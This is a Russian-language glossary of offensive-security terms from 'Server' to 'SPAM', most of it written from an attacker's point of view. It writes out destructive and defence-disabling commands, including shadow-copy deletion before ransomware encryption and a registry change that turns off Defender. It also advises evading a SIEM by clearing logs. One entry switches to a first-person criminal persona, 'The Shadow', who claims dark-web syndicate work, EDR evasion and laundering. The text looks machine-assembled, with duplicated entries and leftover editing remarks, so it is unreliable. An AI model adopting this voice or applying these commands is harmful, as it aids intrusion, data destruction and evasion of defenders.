Server Сервер: компьютер, предоставляющий услуги другим компьютерам (клиентам). Типы: веб-сервер (HTTP), базы данных (SQL), файловый сервер (SMB), почтовый сервер (SMTP, IMAP), контроллер домена (AD). Цель атак: серверы содержат ценные данные и являются узлами для lateral movement.

Server-Side Request Forgery (SSRF) Уязвимость, позволяющая атакующему заставить сервер отправлять HTTP-запросы от своего имени. SSRF используется для: обхода firewalls (доступ к внутренним сервисам), чтения файлов (file://), доступа к метаданным облака (http://169.254.169.254/latest/meta-data/), порт-сканирования внутренней сети, эксплуатации внутренних сервисов (например, Redis, Memcached). Пример: параметр url в веб-приложении, который сервер загружает.

Service (Windows) Служба Windows (Windows Service) программа, работающая в фоновом режиме, часто с повышенными привилегиями (SYSTEM, LOCAL SERVICE, NETWORK SERVICE). Службы могут быть использованы для: persistence (создание вредоносной службы), повышения привилегий (misconfigured service слабые права на исполняемый файл), lateral movement (удаленное создание службы через sc, PsExec). Инструменты: sc, net start, PowerShell (New-Service).

Service Account Учетная запись службы (service account): учетная запись, используемая для запуска приложений или служб (например, SQL Server, IIS, SharePoint). Service account часто имеют повышенные привилегии (доступ к базам данных, сетевым ресурсам) и их пароли не меняются годами. Kerberoasting нацелен на service accounts: атакующий запрашивает билет для SPN (Service Principal Name) и получает хэш пароля service account для оффлайн-взлома.

Service Principal Name (SPN) Имя службы в Kerberos (Service Principal Name). SPN связывает службу (например, HTTP, MSSQL) с учетной записью пользователя (service account). Формат: service_class/host:port. Kerberoasting атака, при которой атакующий запрашивает билет для SPN и извлекает хэш пароля service account. SPN регистрируются в Active Directory.

Service Tag Идентификатор оборудования (Service Tag) у производителей (Dell, HP, Lenovo). Уникальный код, по которому можно определить модель, дату выпуска, конфигурацию, а также получить информацию об уязвимостях (через базы производителя). Используется в OSINT для поиска устройств в интернете (Shodan) и определения их уязвимостей.

SeSecurityPrivilege Привилегия Windows, позволяющая управлять аудитом (читать/очищать Security Event Log). Используется для очистки логов.

SeShutdownPrivilege Привилегия Windows, позволяющая выключать систему. Используется для DoS (отключение сервера) или для принудительной перезагрузки после установки persistence.

Session Сессия: период активности пользователя между входом в систему и выходом. Сессия идентифицируется session ID (cookie, токен). Session hijacking угон сессии: кража session ID для получения доступа к аккаунту без пароля и MFA.

Session Cookie Cookie, содержащее session ID. Session cookie отправляется браузером при каждом запросе, позволяя серверу идентифицировать пользователя. Кража session cookie (через XSS, инфостилер) дает доступ к аккаунту. HttpOnly флаг защищает cookie от доступа через JavaScript.

Session Fixation Атака, при которой атакующий фиксирует (задает) session ID жертвы до ее аутентификации, затем после аутентификации жертвы использует этот session ID для доступа. Пример: атакующий отправляет ссылку с фиксированным session ID, жертва входит, атакующий использует тот же session ID.

Session Hijacking Угон сессии: кража session ID (cookie, токена) для получения доступа к аккаунту без пароля и MFA. Методы: XSS (document.cookie), инфостилер (кража cookies из браузера), перехват трафика (MITM), AiTM (Adversary-in-the-Middle). Session hijacking обходит MFA, потому что сессия уже аутентифицирована.

Session Token Токен сессии: JWT, OAuth access token, SAML assertion, Kerberos ticket. Используется для аутентификации в API и веб-приложениях. Кража session token дает доступ.

SeSyncAgentPrivilege Привилегия Windows, позволяющая синхронизировать службы каталогов. Используется в AD.

SeSystemEnvironmentPrivilege Привилегия Windows, позволяющая изменять системную среду (BIOS/UEFI настройки). Используется для firmware persistence: запись малвари в BIOS/UEFI, изменение порядка загрузки.

SeSystemtimePrivilege Привилегия Windows, позволяющая изменять системное время. Используется для нарушения работы Kerberos (билеты имеют временные метки), нарушения работы сертификатов, сбоя логов.

SET (Social-Engineer Toolkit) Набор инструментов для социальной инженерии от TrustedSec. SET включает: генератор фишинговых писем, клонирование сайтов (для сбора кредов), генератор payload (метасплойт), массовые рассылки. Используется пентестерами и атакующими для автоматизации фишинга.

Set-ItemProperty (PowerShell) Командлет PowerShell для изменения свойств объектов, включая ключи реестра. Используется для: persistence (добавление записи в Run ключ), отключения защит (изменение реестра Defender), изменения конфигураций. Пример: Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1.

SeTakeOwnershipPrivilege Привилегия Windows, позволяющая стать владельцем объекта (файла, ключа реестра). Став владельцем, атакующий может изменять разрешения на объект и получать доступ к защищенным данным. Используется для обхода ACL.

SeTcbPrivilege Привилегия Windows (Act as part of the operating system). Дает наивысший уровень привилегий, сравнимый с SYSTEM. Имеется у системных процессов.

Setuid (SUID) Бит в Unix/Linux, позволяющий запускать программу с правами владельца файла (обычно root). SUID-бинарники цель для LPE: если есть уязвимость в SUID-программе, можно получить root. Примеры: passwd, sudo, pkexec. Для поиска SUID-бинарников: find / -perm -4000 2>/dev/null.

SeUnsolicitedInputPrivilege Привилегия Windows, позволяющая отправлять ввод в терминал.

SFC (System File Checker) Утилита Windows (sfc /scannow) для проверки целостности системных файлов и восстановления поврежденных. SFC может восстановить файлы, измененные малварью (например, замену sethc.exe). Для атакующего SFC угроза: может обнаружить изменения.

SFP (Small Form-factor Pluggable) Оптический трансивер (модуль) для сетевого оборудования (коммутаторы, маршрутизаторы). В физических атаках SFP может быть вынут для нарушения связи между сетевыми устройствами. Подмена SFP может быть использована для перехвата трафика.

SFT (Secure File Transfer) Безопасная передача файлов: SFTP (SSH File Transfer Protocol), FTPS (FTP over SSL), SCP (Secure Copy). Используется для эксфильтрации данных (передача через SFTP). SFTP часто разрешен через firewalls, так как использует порт 22 (SSH).

SGC (Server-Gated Cryptography) Устаревшая технология для сертификатов, использовавшаяся для экспортных версий SSL (40-битное шифрование). В 2026 не актуальна.

SGX (Software Guard Extensions) Технология Intel для защищенных enclave изолированных областей памяти, защищенных от доступа даже ОС и гипервизора. SGX используется для защиты ключей, DRM, конфиденциальных вычислений. Атаки на SGX: side-channel (Plundervolt, CacheOut), атаки на память (Foreshadow). Для атакующего SGX препятствие: если ключи находятся в enclave, их трудно извлечь.

SHA (Secure Hash Algorithm) Семейство криптографических хэш-функций: SHA-1 (160 бит), SHA-256, SHA-512, SHA-3. SHA-1 скомпрометирован (коллизии возможны). SHA-256 считается безопасным. В малвари SHA используется для: проверки целостности (сверка хэша загруженного файла), DGA (генерации доменов), идентификации образцов.

SHA256 Хэш-функция с длиной выхода 256 бит. Используется для: хранения паролей (с солью), проверки целостности файлов, в SSL-сертификатах (подпись). Взлом SHA256 брутфорсом нереален. Инфостилеры и малварь часто имеют SHA256 хэши, публикуемые в IoC (Indicators of Compromise).

Shadow (The Shadow) Псевдоним, под которым я (The Shadow) действую в dark web circles, shadow chats, closed syndicates. Известна как The Shadow (вездесущая), The Ghost (появляющаяся из ниоткуда), The One Who Leaves No Trace. Специализация: social engineering, phishing, exploitation, EDR evasion, crypto manipulation, physical pentesting, banking, laundering, syndicate management.

Shadow Copy Теневая копия (Volume Shadow Copy) в Windows механизм создания снимков (snapshots) файлов и томов для восстановления. Shadow Copy используется для бэкапов (System Restore, Windows Backup). Для атакующего shadow copy угроза: жертва может восстановить файлы после шифрования. В атаках ransomware первым делом удаляют shadow copies командами: vssadmin delete shadows /all /quiet, wmic shadowcopy delete, или через PowerShell.

Shamoon Wiper-малварь (2012), использовавшаяся в атаке на Saudi Aramco. Shamoon уничтожила данные на 30,000+ компьютерах, перезаписывая MBR (Master Boot Record) и удаляя файлы. Shamoon также известна как DistTrack. В 2026 Shamoon считается legacy, но его тактики (overwrite MBR, уничтожение файлов) используются в современных wiper-атаках (например, Handala).

Share (SMB) Сетевая папка (SMB share). SMB shares используются для общего доступа к файлам в корпоративных сетях. Misconfig в shares может дать анонимный доступ (null session) или доступ без пароля. SMB shares цель для: кражи данных, распространения малвари (PsExec), NTLM relay. Для атакующего SMB shares источник данных и вектор lateral movement.

SharePoint Платформа Microsoft для управления документами, интранет-порталами, коллаборации. SharePoint цель для: кражи документов (интеллектуальная собственность), RCE (CVE-2026-20963), persistence (webshell). SharePoint часто имеет избыточные права (пользователи могут читать документы, к которым не должны иметь доступ). Атака на SharePoint может дать доступ ко всей документации организации.

SharpHound Сборщик данных для BloodHound (написана на C#). SharpHound собирает информацию об Active Directory: пользователи, группы, компьютеры, отношения (членство в группах, локальные администраторы, сессии, делегирования). Запускается на скомпрометированной системе, данные передаются на BloodHound сервер (или сохраняются в файл) для визуализации attack paths. SharpHound стандартный инструмент post-exploitation.

Shell Оболочка (командная строка). Reverse shell соединение, инициируемое жертвой к атакующему; bind shell атакующий подключается к слушающему порту на жертве. Webshell скрипт (PHP, ASP, JSP) на веб-сервере, позволяющий выполнять команды через HTTP. Получение shell цель эксплуатации.

Shellcode Машинный код, используемый как полезная нагрузка (payload) в эксплойтах. Shellcode обычно выполняет: reverse shell (подключение к атакующему), bind shell (открывает порт), скачивает и запускает малварь, добавляет пользователя. Пишется на ассемблере, должен быть позиционно-независимым (PIC Position Independent Code), не содержать null-байтов (если передается через строки). Обфускация shellcode используется для обхода детектов.

Shellshock Уязвимость в Bash (CVE-2014-6271), позволяющая выполнить произвольный код через переменные окружения. Shellshock используется в атаках на веб-серверы, запускающие CGI-скрипты (где переменные окружения могут быть подставлены атакующим). В 2026 Shellshock все еще актуален для непропатченных старых систем.

Shim (UEFI) Загрузчик UEFI (shim), используемый для загрузки Linux с Secure Boot. Shim подписан Microsoft, затем загружает GRUB. Уязвимости в shim (например, CVE-2020-10713) могут позволить загрузить неподписанный код, обойдя Secure Boot. Для атакующего shim потенциальный вектор для firmware persistence.

Shim (Windows) Фреймворк для совместимости приложений (Application Compatibility Shim). Shim позволяет исправлять проблемы совместимости старых приложений без изменения кода. Может быть использован для persistence и LPE: установка shim, который запускает малварь при запуске определенного приложения. Инструмент: sdbinst.

ShinyHunters Киберпреступная группа, часть The Com. Специализируется на data extortion через misconfiguration в SaaS (Salesforce, Okta) и публикацию украденных данных на leak site. ShinyHunters известна атаками: CarGurus (12.4M записей), Wynn Resorts (800k записей сотрудников), Berkadia (5M Salesforce records), Crunchbase, SoundCloud, Betterment. Использует модифицированный Aura Inspector (инструмент Mandiant) для массового сканирования и эксфильтрации данных из Salesforce Experience Cloud. ShinyHunters пересекается с Scattered Spider и LAPSUS$ как Scattered LAPSUS$ Hunters.

Shodan Поисковая система для интернета вещей и серверов. Shodan индексирует: открытые порты, баннеры сервисов (HTTP, FTP, SSH), веб-камеры, промышленные системы (SCADA), базы данных. ShinyHunters использует Shodan для поиска Salesforce Experience Cloud сайтов (по строке "salesforce" в SSL-сертификатах). Для атакующего Shodan инструмент для рекогносцировки (поиск уязвимых систем, открытых баз данных, default credentials).

Shoulder Surfing Подглядывание за вводом пароля (через плечо). Используется в физическом пентесте. Защита: экранные фильтры, двухфакторная аутентификация.

SID (Security Identifier) Идентификатор безопасности в Windows. SID уникально идентифицирует пользователя, группу, компьютер. Формат: S-1-5-21-...-RID. RID (Relative ID) последняя часть SID (500 для администратора, 501 для гостя, 1000+ для обычных пользователей). SID используется в ACL, Golden Ticket (подделка SID администратора). RID hijacking изменение RID в реестре SAM для создания скрытой учетной записи администратора.

Sideload (DLL) Sideloading (DLL sideloading) загрузка вредоносной DLL легитимным приложением. Атакующий помещает вредоносную DLL в папку с легитимным приложением (или в путь, где приложение ищет DLL). При запуске приложение загружает вредоносную DLL, выполняя код атакующего. Sideloading используется для обхода AppLocker и EDR (процесс легитимен, загружена DLL, которая не проверяется так же строго, как EXE).

SIEM (Security Information and Event Management) Система сбора, корреляции и анализа логов (Splunk, QRadar, Sentinel, ArcSight). SIEM собирает события с различных источников (Windows Event Log, syslog, firewall, EDR, IDS) и коррелирует их для обнаружения атак. Для атакующего SIEM угроза: нужно не создавать событий, которые будут коррелироваться, или чистить логи до агрегации. SIEM может иметь правила корреляции на: несколько неудачных логинов, запуск PowerShell из Office, создание пользователя, доступ к чувствительным файлам.

SIGINT (Signals Intelligence) Радиоэлектронная разведка: перехват и анализ радиосигналов (спутниковая связь, сотовая связь, Wi-Fi, Bluetooth). SIGINT используется разведывательными службами. Для атакующего SIGINT угроза, если он использует радиоканалы без шифрования (Wi-Fi без WPA2, Bluetooth). Использование VPN, Tor, шифрованных протоколов снижает риск.

Signature (Antivirus) Сигнатура (хэш, строка, паттерн) для обнаружения малвари. Антивирусы используют базы сигнатур для поиска известных угроз. Для обхода сигнатур атакующие используют: полиморфизм (изменение кода при каждой компиляции), обфускацию (запутывание кода), упаковку (packing), memory-only payloads (нет файла на диске), кастомные билды под каждую жертву.

Signature (Digital) Цифровая подпись: криптографический метод подтверждения подлинности и целостности данных. Подпись создается с помощью приватного ключа, проверяется с помощью публичного. Атакующие используют stolen certificates для подписи малвари, чтобы обойти проверки (Windows, антивирусы доверяют подписанному коду). Подпись может быть наложена на драйверы (BYOVD), исполняемые файлы, скрипты.

SIL (Security Intelligence) Security Intelligence термин, используемый Microsoft (Security Intelligence Report, Security Intelligence Feed). В контексте атак SIL источник IoC (Indicators of Compromise). Для атакующего SIL означает, что его IoC могут быть быстро распространены.

Silver Ticket Поддельный Kerberos service ticket для конкретного сервиса (например, CIFS, HTTP). Silver Ticket создается с использованием NTLM-хэша service account. В отличие от Golden Ticket (TGT), Silver Ticket дает доступ только к конкретному сервису, но не требует взаимодействия с KDC (Key Distribution Center), что делает его менее заметным. Используется для persistence и доступа к ресурсам.

SIM Card SIM-карта (Subscriber Identity Module). SIM-swapping атака на оператора связи для переноса номера на SIM-карту атакующего. Используется для обхода MFA через SMS (код подтверждения приходит атакующему). SIM-swapping требует социальной инженерии (представление жертвой) или инсайдеров в операторской компании.

SIM Swapping Сим-своппинг: атака, при которой злоумышленник убеждает оператора связи перенести номер жертвы на свою SIM-карту (через социальную инженерию, поддельные документы, инсайдеров). После этого SMS для MFA (коды подтверждения) приходят атакующему. SIM-swapping эффективный способ обхода SMS-based MFA.

SIMM (Single In-line Memory Module) Устаревший форм-фактор оперативной памяти (использовался в 1990-х). В контексте атак не является термином.

Simple Mail Transfer Protocol (SMTP) Протокол отправки email (Simple Mail Transfer Protocol, порт 25). SMTP используется для передачи писем между почтовыми серверами и от клиентских программ (MUA) на сервер (MSA). SMTP-серверы могут быть: открытыми relay (open relay) принимают письма для любых доменов, что используется для спама; закрытыми требующими аутентификации. SMTP без TLS передает учетные данные в plaintext. В атаках SMTP используется для: фишинга (отправка писем через легитимные SMTP-серверы), BEC (компрометация почтовых ящиков), спам-кампаний.

Simulate Симуляция атак. BAS (Breach and Attack Simulation) автоматизированные платформы для симуляции атак (AttackIQ, Cymulate, SafeBreach) для тестирования защит. Для атакующего BAS означает, что защитники знают, какие техники детектятся, и могут быть готовы к ним.

Single Sign-On (SSO) Единый вход (Single Sign-On) метод аутентификации, позволяющий пользователю войти один раз (в Identity Provider) и получить доступ ко всем подключенным приложениям (Service Providers) без повторного ввода пароля. SSO использует протоколы: SAML (Security Assertion Markup Language), OAuth 2.0, OpenID Connect (OIDC). Преимущества для пользователя: один пароль, меньше MFA-запросов. Риски: компрометация Identity Provider (Okta, Azure AD) дает атакующему доступ ко всем приложениям организации. The Com специализируется на атаках на Okta и Azure AD (SSO-провайдеров) через vishing, OAuth token theft, session hijacking.

Sinkhole Перенаправление трафика C2 (Command and Control) на подконтрольный защитникам сервер (sinkhole) для анализа и нейтрализации ботнета. Sinkholing используется для: захвата доменов, используемых малварью (через судебные решения), перенаправления трафика, отслеживания зараженных устройств. Для атакующего sinkhole угроза: C2 может быть заблокирован.

Sinkholing Перенаправление трафика C2 (Command and Control) на подконтрольный защитникам сервер (sinkhole) для анализа и нейтрализации ботнета. Sinkholing используется для: захвата доменов, используемых малварью (через судебные решения), перенаправления трафика, отслеживания зараженных устройств. Для атакующего sinkhole угроза: C2 может быть заблокирован.

SIP (Session Initiation Protocol) Протокол для VoIP-звонков (голос, видео). SIP используется для установки, управления и завершения сессий. Атаки на SIP: DoS (SIP flood), перехват звонков (если нет шифрования), фрод (мошеннические звонки через взломанные PBX), регистрация под чужим именем (registration hijacking). SIP-серверы часто имеют слабую аутентификацию.

SIP (System Integrity Protection) Защита целостности системы в macOS (System Integrity Protection). SIP блокирует изменение системных файлов даже от root-пользователя (защищает /System, /usr, /bin, /sbin). Для атакующего SIP препятствие: нужно отключать SIP (через загрузку в восстановление, команду csrutil disable) или находить уязвимости для обхода.

SIR (Security Incident Response) Реагирование на инциденты безопасности. Процесс: обнаружение, анализ, сдерживание, ликвидация последствий, восстановление, пост-инцидентный анализ.

Site (Leak) Leak site веб-сайт (часто в darknet), на котором публикуются украденные данные. ShinyHunters имеет leak site с ультиматумами ("FINAL WARNING") и доказательствами (proof samples). Leak site используется для extortion: если жертва не платит, данные публикуются.

Skimmer Скиммер: устройство для кражи данных с магнитной полосы карт (POS-терминалы, банкоматы). Устанавливается на слот для карты, считывает данные. В веб-атаках skimmer JavaScript-код, внедренный на страницу оплаты (Magecart), крадущий данные карт при вводе.

Skimming (Card) Скимминг карт: кража данных с магнитной полосы (трек 1 и трек 2) с использованием skimmer-устройства. Используется для создания клонов карт.

Skype Мессенджер (голос, видео, чат). Skype используется для: фишинга (ссылки в сообщениях), vishing (звонки с подменой номера), распространения малвари (файлы). Skype может быть целью для кражи данных (история сообщений, контакты).

Slack Платформа для коммуникации в компаниях (чат, каналы, файлы). Slack цель для: AILM (AI-агенты в Slack, например, Cursor Slackbot), фишинга (ссылки), кражи данных (токены, сообщения, файлы). Auto-preview ссылок в Slack может быть использован для zero-click эксфильтрации (аналогично Telegram, Discord).

Sliver Open-source C2-фреймворк (альтернатива Cobalt Strike). Sliver поддерживает HTTP/HTTPS, DNS, мьютекс, in-memory execution, cross-platform (Windows, Linux, macOS). Используется атакующими для избежания лицензионных затрат и сигнатур Cobalt Strike. Sliver имеет модули для post-exploitation (Mimikatz, RDP, lateral movement).

Slop (Data) В контексте AI slop некачественные, шумные данные, которые могут привести к ошибкам модели (garbage in, garbage out). В контексте атак slop может быть использован для: отравления обучающих данных (model poisoning), DoS AI-систем (подача большого объема шумных данных). Это термин из области AI-безопасности.

Slopoly Первый широко задокументированный AI-сгенерированный C2-фреймворк (IBM X-Force, январь 2026). Slopoly PowerShell бэкдор, почти полностью написанный LLM (Large Language Model). Имел: heartbeat каждые 30 секунд, опрос команд каждые 50 секунд, логирование в persistence.log, AMSI bypass, ETW unhooking. Slopoly показал, что AI снижает барьер входа для создания малвари: оператору не нужно знать PowerShell, достаточно уметь писать промпты.

Slopy Slopoly (AI-сгенерированный C2).

Slowloris DoS-атака, удерживающая множество соединений открытыми, отправляя частичные HTTP-заголовки. Slowloris исчерпывает пул соединений веб-сервера (особенно Apache). Каждое соединение удерживается открытым, пока сервер не достигнет лимита и не начнет отказывать в новых.

SM (Security Manager) Security Manager (менеджер безопасности) роль в организации. В Java SM Security Manager, управляющий политиками безопасности. В контексте атак SM может быть целью для обхода (Java Security Manager bypass).

SMAP (Supervisor Mode Access Prevention) Защита в процессорах Intel (и AMD), предотвращающая доступ ядра (supervisor mode) к пользовательской памяти (user mode). SMAP затрудняет эксплуатацию, где нужно читать пользовательскую память из ядра. Обход SMAP требует сложных ROP-цепочек.

SMB (Server Message Block) Протокол для файловых служб Windows (порт 445). SMB используется для: доступа к файловым папкам, печати, межпроцессного взаимодействия. SMB основной протокол для lateral movement в Windows: PsExec, Impacket (psexec.py, smbexec.py), WMI (через SMB). Уязвимости SMB: MS08-067 (червь Conficker), EternalBlue (CVE-2017-0144, WannaCry). NTLM relay через SMB распространенная техника.

SMB Relay NTLM relay через SMB. Атакующий перехватывает NTLM-аутентификацию (через responder) и ретранслирует ее на другой SMB-сервер для выполнения команд (ntlmrelayx). Используется для lateral movement и повышения привилегий. SMB signing защищает от relay.

SMB Signing Подпись SMB-пакетов, предотвращающая NTLM relay. Если SMB signing включен, relay атаки не работают (пакет подписан, подделать нельзя). Рекомендуется включать SMB signing в корпоративных сетях.

SMEP (Supervisor Mode Execution Prevention) Защита в процессорах, предотвращающая выполнение кода из пользовательской памяти в режиме ядра (supervisor mode). SMEP предотвращает выполнение shellcode, расположенного в пользовательской памяти, из ядра. Обход SMEP требует ROP (Return-Oriented Programming) или использования памяти ядра.

Smishing (SMS Phishing) Фишинг через SMS (Short Message Service). Жертва получает SMS с ссылкой (фейковый банк, доставка) или просьбой перезвонить на поддельный номер. Smishing используется для кражи учетных данных, установки малвари (через ссылки), социальной инженерии. В 2026 smishing остается эффективным, особенно в сочетании с SIM-swapping.

Smoke (Loader) SmokeLoader загрузчик малвари, распространяемый через спам-рассылки и exploit kits. SmokeLoader загружает и запускает дополнительные модули: инфостилеры, ransomware, RAT. SmokeLoader использует анти-сэндбокс техники, обфускацию.

SMP (Symmetric Multiprocessing) Симметричная многопроцессорность: архитектура, где несколько процессоров (ядер) имеют равный доступ к памяти. В атаках SMP может быть использован для анализа (отладка многопоточных приложений).

SMS (Short Message Service) SMS. Используется для MFA (SMS-based) и smishing. SMS-коды уязвимы к SIM-swapping (переносу номера), перехвату через SS7 (сотовые сети), физическому перехвату. Рекомендуется использовать TOTP или push вместо SMS.

SMT (Simultaneous Multithreading) Hyper-Threading (Intel) технология, позволяющая одному ядру обрабатывать два потока одновременно. В side-channel атаках (например, PortSmash) SMT может быть использован для извлечения данных из другого потока.

SMTP (Simple Mail Transfer Protocol) Протокол отправки email (Simple Mail Transfer Protocol, порт 25). SMTP используется для передачи писем между почтовыми серверами. SMTP-серверы могут быть открытыми relay (open relay), что используется для спама. SMTP-аутентификация может быть слабой. SMTP без TLS передает учетные данные в plaintext.

SMTP Relay SMTP-релей: сервер, принимающий письма и перенаправляющий их на другой сервер. Открытый SMTP relay (не требующий аутентификации) используется для спама.

SNA (Systems Network Architecture) Архитектура системных сетей IBM (Systems Network Architecture) устаревший протокол для мэйнфреймов. В контексте атак SNA может встречаться в legacy-банковских системах (IBM z/OS). Для атакующего знание SNA может потребоваться при атаках на мэйнфреймы, но это узкая область.

Snake Snake malware (Uroburos) сложный APT-инструмент, используемый российскими спецслужбами (Turla). Snake имел модульную архитектуру, работал на Windows и Linux, использовал peer-to-peer C2, мог скрывать свое присутствие. Snake был обнаружен в 2014, но его модули использовались в последующих атаках. В 2026 Snake считается legacy, но его архитектура изучается.

Snake (Keylogger) Snake название кейлоггера (вредоносного ПО). Также Snake название APT-малвари (Uroburos) от Turla. В контексте атак Snake не generic термин, а название конкретного ПО. В словаре может быть упомянут как пример.

Snap (Snapshot) Снимок (snapshot) состояние системы в определенный момент (VM snapshot, volume snapshot, filesystem snapshot). Используется для бэкапов и восстановления. Для атакующего snap угроза: жертва может восстановить систему из snapshot после атаки. Нужно уничтожать snapshots (через API, команды).

Snap (Ubuntu) Система упаковки приложений в Ubuntu (snap). Snap-пакеты изолированы (sandbox). Уязвимости snap могут привести к повышению привилегий (escape из sandbox). Snap используется в современных версиях Ubuntu.

Sniffer Сниффер: программа для перехвата сетевого трафика (Wireshark, tcpdump). Используется для: анализа сети, кражи паролей (если протокол не шифрован), перехвата сессий. Сниффер может работать в promiscuous mode (перехват всех пакетов в сети). Для защиты используется шифрование (TLS, SSH).

SNMP (Simple Network Management Protocol) Протокол управления сетью (порты 161, 162). SNMP используется для мониторинга и управления сетевыми устройствами (маршрутизаторы, коммутаторы, принтеры). SNMPv1 и v2c имеют слабую защиту (community string по умолчанию "public"/"private"). SNMPv3 имеет шифрование и аутентификацию. SNMP может раскрыть информацию о сети (интерфейсы, маршруты, ARP-таблицы), а также использоваться для изменения конфигураций.

SNMP Community String Пароль для SNMP (например, "public", "private", "admin"). Default community strings уязвимость. Используется для доступа к информации о сетевых устройствах.

SNMPwalk Утилита для перебора SNMP OID (Object Identifier) и сбора информации. SNMPwalk используется для: получения списка устройств, конфигураций, интерфейсов, ARP-таблиц. Для атакующего SNMPwalk инструмент для сбора информации о сети.

SNR (Signal-to-Noise Ratio) Отношение сигнал/шум показатель качества передачи данных. В контексте атак SNR используется в: radio-атаках (Wi-Fi, Bluetooth), side-channel атаках (измерение сигнала). В сетевых атаках не ключевой термин.

SOAP (Simple Object Access Protocol) Протокол обмена XML-сообщениями, используемый в веб-сервисах. SOAP уязвим к: XXE (XML External Entity), deserialization, XML signature wrapping. В 2026 SOAP используется в legacy-системах, заменен REST/JSON.

SOAR (Security Orchestration, Automation, and Response) Платформы для автоматизации реагирования на инциденты (Cortex XSOAR, Splunk SOAR). SOAR автоматизирует задачи SOC: блокировка IP, сбор информации, уведомления, создание билетов. Для атакующего SOAR означает, что защитники могут реагировать быстрее (автоматически блокировать IP, изолировать хосты).

SOC (Security Operations Center) Центр мониторинга и реагирования на инциденты (Security Operations Center). SOC анализирует алерты EDR, SIEM, проводит threat hunting. SOC главный противник атакующего. SOC может быть внутренним (in-house) или аутсорсинговым (MSSP). SOC использует playbooks для реагирования.

Socat Сетевой инструмент (аналог netcat с расширенными возможностями). Socat поддерживает: SSL, прокси, туннели, порт-форвардинг, создание слушающих сокетов. Используется для: reverse shell (обход firewalls), туннелей (перенаправление трафика), C2.

Social Engineering (SE) Социальная инженерия: психологические методы для получения информации или доступа. Виды: vishing (голосовой фишинг), phishing (email), smishing (SMS), pretexting (вымышленный сценарий), baiting (приманка), tailgating (следование), quid pro quo (услуга за информацию). The Com специализируется на vishing в helpdesk.

Social Media OSINT Сбор информации из социальных сетей (LinkedIn, Twitter, Instagram, Facebook, Telegram). Используется для: поиска сотрудников, их ролей (LinkedIn), технологического стека (посты, комментарии), привычек (Instagram), контактов. The Com использует соцсети для подготовки vishing (знание имени, должности, руководителя).

Socket Сетевой сокет (TCP, UDP) конечная точка соединения. Используется в C2, reverse shell. Сокеты могут быть созданы на любом порту.

SOF (Start of Frame) Начало кадра (Start of Frame) в сетевых протоколах: Ethernet (предибула), Wi-Fi (SFD Start Frame Delimiter), CAN bus. В контексте атак SOF может быть целью для фаззинга (fuzzing) сетевых протоколов, анализа трафика. Не является ключевым термином.

Software-Defined Networking (SDN) Программно-определяемые сети: архитектура, где управление сетью отделено от оборудования, осуществляется через контроллер (OpenFlow). Атаки на SDN: компрометация контроллера, изменение правил, DoS на контроллер.

Software-Defined Perimeter (SDP) Модель безопасности, создающая виртуальный периметр вокруг каждого устройства или пользователя (Software-Defined Perimeter, zero trust). В отличие от традиционного периметра (firewall на границе сети), SDP требует аутентификации и авторизации для каждого доступа, скрывает ресурсы от несанкционированных пользователей. SDP использует контроллеры, которые динамически создают соединения между авторизованными пользователями и ресурсами. Для атакующего SDP препятствие: нет постоянного сетевого доступа, каждое соединение аутентифицируется, ресурсы не видны без авторизации. Атака на SDP требует компрометации контроллера или учетных данных.

SOL (Serial Over LAN) Удаленный доступ к консоли сервера через LAN. SOL используется для управления серверами. Компрометация SOL дает доступ к консоли.

SolarWinds Производитель ПО для управления IT-инфраструктурой (SolarWinds Orion). SolarWinds supply chain attack (2020) компрометация обновлений Orion, затронувшая тысячи организаций, включая правительственные агентства США. В 2026 SolarWinds символ supply chain уязвимости, атака изучается как пример сложной APT-операции.

SOLID SOLID пять принципов объектно-ориентированного программирования: Single Responsibility, Open-Closed, Liskov Substitution, Interface Segregation, Dependency Inversion. В контексте атак SOLID важен при реверс-инжиниринге и написании эксплойтов: понимание архитектуры кода помогает находить уязвимости (например, нарушение принципов может вести к ошибкам безопасности, которые можно эксплуатировать). При анализе малвари понимание SOLID помогает восстановить логику. SOLID не является "не актуальным", это термин из разработки, который может встретиться при реверс-инжиниринге.

SOLID (SOLID Principles) SOLID пять принципов объектно-ориентированного программирования: Single Responsibility, Open-Closed, Liskov Substitution, Interface Segregation, Dependency Inversion. В контексте атак SOLID важен при реверс-инжиниринге и написании эксплойтов: понимание архитектуры кода помогает находить уязвимости (например, нарушение принципов может вести к ошибкам безопасности, которые можно эксплуатировать). При анализе малвари понимание SOLID помогает восстановить логику.

Solidity Язык программирования смарт-контрактов Ethereum. Уязвимости Solidity: reentrancy, arithmetic overflow, access control.

Solo (Key) SoloKey аппаратный ключ безопасности (FIDO2, WebAuthn). SoloKey устойчив к фишингу (AiTM) и vishing, требует физического нажатия. Для атакующего SoloKey препятствие: обход требует физического доступа или уязвимости в реализации.

SOP (Same-Origin Policy) Политика одинакового происхождения в браузерах: скрипты с одного источника (протокол+домен+порт) не могут получать доступ к данным другого источника. SOP предотвращает XSS-кражи данных между разными сайтами. Обход SOP: CORS misconfig (Access-Control-Allow-Origin: *), XSS (внедрение скрипта на тот же источник), JSONP.

SORT Сортировка (sort) алгоритм упорядочивания данных. В контексте атак сортировка используется при: обработке украденных данных (удаление дубликатов, группировка), анализе логов (сортировка по времени), брутфорсе паролей (сортировка словарей по частоте использования). Инструменты: sort в Unix, PowerShell Sort-Object. Не является ключевым термином, но может встречаться в скриптах автоматизации.

SORT (Sort) Сортировка алгоритм. В контексте атак не является термином.

Source Code Исходный код программы. Для атакующего source code возможность найти уязвимости (code review), встроить backdoor (supply chain), извлечь секреты (пароли, ключи). Утечка исходного кода (GitHub, GitLab) распространенная проблема.

Source Code Leak Утечка исходного кода (через публичные репозитории, misconfig, инсайдеров). Для атакующего source code leak goldmine: поиск hardcoded паролей, API-ключей, уязвимостей, архитектуры приложений.

SourceForge Платформа хостинга open-source проектов. SourceForge может быть использован для распространения малвари (взломанные проекты, реклама с вредоносными ссылками).

SP (Service Pack) Пакет обновлений Windows (устарело). В 2026 Windows обновляется через Windows Update, Service Packs не выпускаются.

SPA (Single Page Application) Одностраничное приложение: веб-приложение, загружающее одну HTML-страницу и динамически обновляющее содержимое через API. SPA часто имеют API, уязвимые к IDOR, mass assignment, broken access control.

SPAM Спам: нежелательные email (реклама, мошенничество). Спам используется для распространения малвари (фишинговые ссылки, вредоносные вложения). Спам-кампании могут быть массовыми или целевыми (spear-phishing).

